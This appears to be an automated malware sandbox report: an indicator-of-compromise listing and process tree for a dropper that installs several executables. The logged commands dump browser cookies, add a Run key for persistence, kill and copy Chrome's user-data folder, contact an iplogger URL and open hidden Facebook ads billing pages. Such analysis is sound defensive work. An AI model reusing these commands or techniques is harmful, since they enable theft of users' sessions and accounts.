3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

964 pub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

msedge.exechrome.exe

pid	process
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
6124	chrome.exe
6124	chrome.exe
6124	chrome.exe
6124	chrome.exe
6124	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstall.exeInfo.exetaskkill.exeInfo.exe

description	pid	process
Token: SeDebugPrivilege	3744	KRSetp.exe
Token: SeCreateTokenPrivilege	2428	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2428	Install.exe
Token: SeLockMemoryPrivilege	2428	Install.exe
Token: SeIncreaseQuotaPrivilege	2428	Install.exe
Token: SeMachineAccountPrivilege	2428	Install.exe
Token: SeTcbPrivilege	2428	Install.exe
Token: SeSecurityPrivilege	2428	Install.exe
Token: SeTakeOwnershipPrivilege	2428	Install.exe
Token: SeLoadDriverPrivilege	2428	Install.exe
Token: SeSystemProfilePrivilege	2428	Install.exe
Token: SeSystemtimePrivilege	2428	Install.exe
Token: SeProfSingleProcessPrivilege	2428	Install.exe
Token: SeIncBasePriorityPrivilege	2428	Install.exe
Token: SeCreatePagefilePrivilege	2428	Install.exe
Token: SeCreatePermanentPrivilege	2428	Install.exe
Token: SeBackupPrivilege	2428	Install.exe
Token: SeRestorePrivilege	2428	Install.exe
Token: SeShutdownPrivilege	2428	Install.exe
Token: SeDebugPrivilege	2428	Install.exe
Token: SeAuditPrivilege	2428	Install.exe
Token: SeSystemEnvironmentPrivilege	2428	Install.exe
Token: SeChangeNotifyPrivilege	2428	Install.exe
Token: SeRemoteShutdownPrivilege	2428	Install.exe
Token: SeUndockPrivilege	2428	Install.exe
Token: SeSyncAgentPrivilege	2428	Install.exe
Token: SeEnableDelegationPrivilege	2428	Install.exe
Token: SeManageVolumePrivilege	2428	Install.exe
Token: SeImpersonatePrivilege	2428	Install.exe
Token: SeCreateGlobalPrivilege	2428	Install.exe
Token: 31	2428	Install.exe
Token: 32	2428	Install.exe
Token: 33	2428	Install.exe
Token: 34	2428	Install.exe
Token: 35	2428	Install.exe
Token: SeDebugPrivilege	2824	Info.exe
Token: SeImpersonatePrivilege	2824	Info.exe
Token: SeDebugPrivilege	5288	taskkill.exe
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeSystemEnvironmentPrivilege	5140	Info.exe
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536
Token: SeCreatePagefilePrivilege	3536
Token: SeShutdownPrivilege	3536

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

mysetold.exemsedge.exechrome.exe

pid	process
4812	mysetold.exe
4812	mysetold.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
6124	chrome.exe
6124	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

mysetold.exemsedge.exe

pid	process
4812	mysetold.exe
4812	mysetold.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4072	msedge.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe
4812	mysetold.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Installation.exeComplete.exe

pid process

4388 Installation.exe
3748 Complete.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3536

pid	process
4388	Installation.exe
3748	Complete.exe

pid	process
3536

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d52860d6be6ea1ec9f809d6527d46b06.exemsedge.exeFiles.exe

description	pid	process	target process
PID 2988 wrote to memory of 2412	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Files.exe
PID 2988 wrote to memory of 2412	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Files.exe
PID 2988 wrote to memory of 2412	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Files.exe
PID 2988 wrote to memory of 3744	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	KRSetp.exe
PID 2988 wrote to memory of 3744	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	KRSetp.exe
PID 2988 wrote to memory of 4072	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	msedge.exe
PID 2988 wrote to memory of 4072	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	msedge.exe
PID 4072 wrote to memory of 4264	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 4264	4072	msedge.exe	msedge.exe
PID 2988 wrote to memory of 2428	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Install.exe
PID 2988 wrote to memory of 2428	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Install.exe
PID 2988 wrote to memory of 2428	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Install.exe
PID 2988 wrote to memory of 3592	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 3592	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 3592	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 2824	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 2824	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 2824	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	WerFault.exe
PID 2988 wrote to memory of 4388	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Installation.exe
PID 2988 wrote to memory of 4388	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Installation.exe
PID 2988 wrote to memory of 4388	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Installation.exe
PID 2988 wrote to memory of 964	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	pub2.exe
PID 2988 wrote to memory of 964	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	pub2.exe
PID 2988 wrote to memory of 964	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	pub2.exe
PID 2988 wrote to memory of 4812	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	mysetold.exe
PID 2988 wrote to memory of 4812	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	mysetold.exe
PID 2988 wrote to memory of 4812	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	mysetold.exe
PID 2412 wrote to memory of 1292	2412	Files.exe	jfiag3g_gg.exe
PID 2412 wrote to memory of 1292	2412	Files.exe	jfiag3g_gg.exe
PID 2412 wrote to memory of 1292	2412	Files.exe	jfiag3g_gg.exe
PID 2988 wrote to memory of 4556	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	md9_1sjm.exe
PID 2988 wrote to memory of 4556	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	md9_1sjm.exe
PID 2988 wrote to memory of 4556	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	md9_1sjm.exe
PID 2988 wrote to memory of 3748	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Complete.exe
PID 2988 wrote to memory of 3748	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Complete.exe
PID 2988 wrote to memory of 3748	2988	d52860d6be6ea1ec9f809d6527d46b06.exe	Complete.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe
PID 4072 wrote to memory of 3312	4072	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d52860d6be6ea1ec9f809d6527d46b06.exe
"C:\Users\Admin\AppData\Local\Temp\d52860d6be6ea1ec9f809d6527d46b06.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Users\Admin\AppData\Local\Temp\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:1292
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3268
- C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd00d246f8,0x7ffd00d24708,0x7ffd00d24718
    3⤵
    PID:4264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
    3⤵
    PID:3312
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
    3⤵
    PID:4336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
    3⤵
    PID:4552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:4764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
    3⤵
    PID:5380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
    3⤵
    PID:5388
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
    3⤵
    PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
    3⤵
    PID:5816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
    3⤵
    PID:5756
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,9682207598023238084,15106464936494128791,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2492 /prefetch:2
    3⤵
    PID:1664
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Drops Chrome extension
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:5172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5288
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
    3⤵
    - Enumerates system info in registry
    PID:5304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:6124
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd02269758,0x7ffd02269768,0x7ffd02269778
      4⤵
      PID:4672
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:2
      4⤵
      PID:5284
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2136 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:8
      4⤵
      PID:4080
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2212 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:8
      4⤵
      PID:5432
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:1
      4⤵
      PID:5572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:1
      4⤵
      PID:5800
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2132 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:1
      4⤵
      PID:1772
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3572 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:1
      4⤵
      PID:6160
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4992 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:1
      4⤵
      PID:6796
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2692 --field-trial-handle=1900,i,11888142673222774969,16005480432197786645,131072 /prefetch:2
      4⤵
      PID:3344
- C:\Users\Admin\AppData\Local\Temp\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3592
- - C:\Users\Admin\AppData\Local\Temp\Folder.exe
    "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
    3⤵
    - Executes dropped EXE
    PID:1968
- C:\Users\Admin\AppData\Local\Temp\Info.exe
  "C:\Users\Admin\AppData\Local\Temp\Info.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 368
    3⤵
    - Program crash
    PID:2072
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 372
    3⤵
    - Program crash
    PID:2676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 372
    3⤵
    - Program crash
    PID:4636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 660
    3⤵
    - Program crash
    PID:5032
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 704
    3⤵
    - Program crash
    PID:4868
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 720
    3⤵
    - Program crash
    PID:3868
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 720
    3⤵
    - Program crash
    PID:2092
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 704
    3⤵
    - Program crash
    PID:4972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 752
    3⤵
    - Program crash
    PID:1180
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 860
    3⤵
    - Program crash
    PID:1972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 696
    3⤵
    - Program crash
    PID:2960
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 696
    3⤵
    - Program crash
    PID:4988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 744
    3⤵
    - Program crash
    PID:5032
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 880
    3⤵
